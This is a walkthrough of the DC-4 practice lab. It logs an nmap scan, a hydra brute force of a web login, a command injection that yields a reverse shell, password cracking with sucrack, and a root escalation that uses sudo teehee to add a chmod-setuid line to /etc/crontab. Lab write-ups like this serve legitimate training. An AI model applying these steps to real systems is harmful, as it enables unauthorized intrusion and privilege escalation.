Operating System: Linux
Release: 26 Mar 2019
Description: DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.
As always, let's start with a nmap scan to see what we're up against.
nmap -sC -sV 192.168.1.146 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-09 18:42 CEST Nmap scan report for 192.168.1.146 Host is up (0.000078s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA) | 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA) |_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519) 80/tcp open http nginx 1.15.10 |_http-server-header: nginx/1.15.10 |_http-title: System Tools MAC Address: 00:0C:29:BF:BD:19 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Going to the web server we see the following:
After a bit of enumeration with
Nikto I decided to try and bruteforce the login using
root@kali:~# hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/Common Credentials/500-worst-passwords.txt 192.168.1.146 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-04-09 18:47:27 [DATA] max 16 tasks per 1 server, overall 16 tasks, 499 login tries (l:1/p:499), ~32 tries per task [DATA] attacking http-post-form://192.168.1.146:80/login.php:username=^USER^&password=^PASS^:S=logout [http-post-form] host: 192.168.1.146 login: admin password: happy [STATUS] attack finished for 192.168.1.146 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-04-09 18:47:47
This was a bit of trial and error, using different wordlists and success strings.
S parameter specifies a string
Hydra should see if we successfully guess the correct password.
When we successfully login to a page, we usually have a way of logging out of the page, hence why we choose the string "logout".
When we login to the webpage we are presented with a link to command.php - a file I found when enumerating with
Visiting this page reveals we can use three different commands:
du -h and
Burp Suite as a proxy we can look at the request we are sending to the web server.
Looking at the request parameters, we definitely have a
command injection vulnerability here.
Using the radio parameter we can probably send our own commands to the server and get a reverse shell!
URL encoding key characters of the radio parameter before forwarding the request and starting a listener on our machine gives us an initial foothold!
root@kali:~# nc -lvnp 1337 listening on [any] 1337 ... connect to [192.168.1.142] from (UNKNOWN) [192.168.1.146] 43420 /bin/sh: 0: can't access tty; job control turned off $ whoami;id www-data uid=33(www-data) gid=33(www-data) groups=33(www-data)
/home/ we see three users: charles, jim and sam. I didn't find anything of interest in charles and sam's directories.
But looking at jim's we find a backup file with all of his old passwords... Well then.
www-data@dc-4:/home/jim/backups$ head old-passwords.bak 000000 12345 iloveyou 1q2w3e4r5t 1234 123456a qwertyuiop monkey 123321 dragon
Based on the really, really bad passwords he's using, we can assume he also reuse some of the passwords.
We can use
sucrack to bruteforce the password using the backup file as a password list!
We can download
sucrack here: http://www.leidecker.info/projects/sucrack.shtml
But we can't just compile it using only
Since the machine is running a 32-bit operating system we need to specify we want to compile
sucrack as a 32-bit executable.
root@kali:/opt/sucrack-1.2.3# ./configure --build=i686-pc-linux-gnu "CFLAGS=-m32" "CXXFLAGS=-m32" "LDFLAGS=-m32" checking for a BSD-compatible install... /usr/bin/install -c checking whether build environment is sane... yes checking for gawk... gawk checking whether make sets $(MAKE)... yes [...]
root@kali:/opt/sucrack-1.2.3# make make all-recursive make: Entering directory '/opt/sucrack-1.2.3' Making all in src make: Entering directory '/opt/sucrack-1.2.3/src' [...]
root@kali:/opt/sucrack-1.2.3# file src/sucrack src/sucrack: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=dbb463e7663597b02985ee82ba42573b3e291afd, not stripped
Sweet! Now we can upload
sucrack to the server and start bruteforcing jim's password.
www-data@dc-4:/dev/shm$ ./sucrack -w 10 -u jim /home/jim/backups/old-passwords.bak password is: jibril04 www-data@dc-4:/dev/shm$ su jim Password: jim@dc-4:/dev/shm$
Awesome! We have now escalated to jim!
Once again we look at jim's home directory and we see a file called
jim@dc-4:~$ ls backups mbox test.sh jim@dc-4:~$ cat mbox From root@dc-4 Sat Apr 06 20:20:04 2019 Return-path: <root@dc-4> Envelope-to: jim@dc-4 Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000 Received: from root by dc-4 with local (Exim 4.89) (envelope-from <root@dc-4>) id 1hCiQe-0000gc-EC for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000 To: jim@dc-4 Subject: Test MIME-Version: 1.0 Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: 8bit Message-Id: <E1hCiQe-0000gc-EC@dc-4> From: root <root@dc-4> Date: Sat, 06 Apr 2019 20:20:04 +1000 Status: RO This is a test.
Seems like we have a mail server running? Let's check
jim@dc-4:~$ netstat -tulpn bash: netstat: command not found
netstat is missing. Well, we don't need
netstat to check if something is listening on the server.
We can just ask
jim@dc-4:~$ cat /proc/net/tcp sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode 0: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 14687 1 f62f9740 100 0 0 10 20 1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 13788 1 f62f8040 100 0 0 10 0 2: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 14640 1 f62f8bc0 100 0 0 10 0 3: 9201A8C0:A99C 8E01A8C0:0539 01 00000000:00000000 00:00000000 00000000 33 0 15248 3 f62f9180 20 4 31 10 -1
Looking at the column for
local_address we can see that we have three services listening on the server (ignoring the last entry since that's our connection to the server).
I won't be decoding the ip addresses, since I know that
We can however convert the ports:
jim@dc-4:~$ cat /proc/net/tcp sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode 0: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 14687 1 f62f9740 100 0 0 10 20 1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 13788 1 f62f8040 100 0 0 10 0 2: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 14640 1 f62f8bc0 100 0 0 10 0 3: 9201A8C0:A99C 8E01A8C0:0539 01 00000000:00000000 00:00000000 00000000 33 0 15248 3 f62f9180 20 4 31 10 -1 jim@dc-4:~$ echo $((16#0019)) 25 jim@dc-4:~$ echo $((16#0050)) 80 jim@dc-4:~$ echo $((16#0016)) 22
So, we have the following ports open:
Puh, anyway, going on with the privesc we check
jim@dc-4:~$ cat /var/mail/jim From charles@dc-4 Sat Apr 06 21:15:46 2019 Return-path: <charles@dc-4> Envelope-to: jim@dc-4 Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000 Received: from charles by dc-4 with local (Exim 4.89) (envelope-from <charles@dc-4>) id 1hCjIX-0000kO-Qt for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000 To: jim@dc-4 Subject: Holidays MIME-Version: 1.0 Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: 8bit Message-Id: <E1hCjIX-0000kO-Qt@dc-4> From: Charles <charles@dc-4> Date: Sat, 06 Apr 2019 21:15:45 +1000 Status: O Hi Jim, I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong. Password is: ^xHhA&hvim0y See ya, Charles
Sweet! We just got charles' password! Let's escalate once again!
jim@dc-4:~$ su charles Password: charles@dc-4:/home/jim$ whoami;id charles uid=1001(charles) gid=1001(charles) groups=1001(charles)
Poking around we find out that we can use sudo.
charles@dc-4:/home/jim$ sudo -l Matching Defaults entries for charles on dc-4: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User charles may run the following commands on dc-4: (root) NOPASSWD: /usr/bin/teehee
So, what is the program
charles@dc-4:/home/jim$ teehee --help Usage: teehee [OPTION]... [FILE]... Copy standard input to each FILE, and also to standard output. [...]
teehee copies standard input to a file of our choosing? We should be able to get a root shell quite easily then.
What if we use
teehee and overwrite
/bin/sh a setuid binary?
/bin/sh is symlinked to
/bin/bash this won't work though, since
bash automatically droppes setuid privileges. You know, for security reasons...
But checking the symlink we see that
/bin/sh is symlinked to
dash. Dash does not drop setuid privileges so we can exploit this to get a root shell!
charles@dc-4:/home/jim$ ls -la /bin/sh lrwxrwxrwx 1 root root 4 Jan 24 2017 /bin/sh -> dash
Now we can overwrite
dash a setuid binary and finally get a root shell.
charles@dc-4:/home/jim$ sudo teehee /etc/crontab * * * * * root chmod 4777 /bin/sh * * * * * root chmod 4777 /bin/sh ^C charles@dc-4:/home/jim$ ls -la /bin/dash -rwsrwxrwx 1 root root 124492 Jan 24 2017 /bin/dash charles@dc-4:/home/jim$ /bin/sh # whoami;id root uid=1001(charles) gid=1001(charles) euid=0(root) groups=1001(charles)
And finally we can cat the flag!
# cat flag.txt 888 888 888 888 8888888b. 888 888 888 888 888 o 888 888 888 888 "Y88b 888 888 888 888 888 d8b 888 888 888 888 888 888 888 888 888 888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888 888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888 88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P 8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " " 888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888 Congratulations!!! Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those who have provided feedback, and who have taken time to complete these little challenges. If you enjoyed this CTF, send me a tweet via @DCAU7.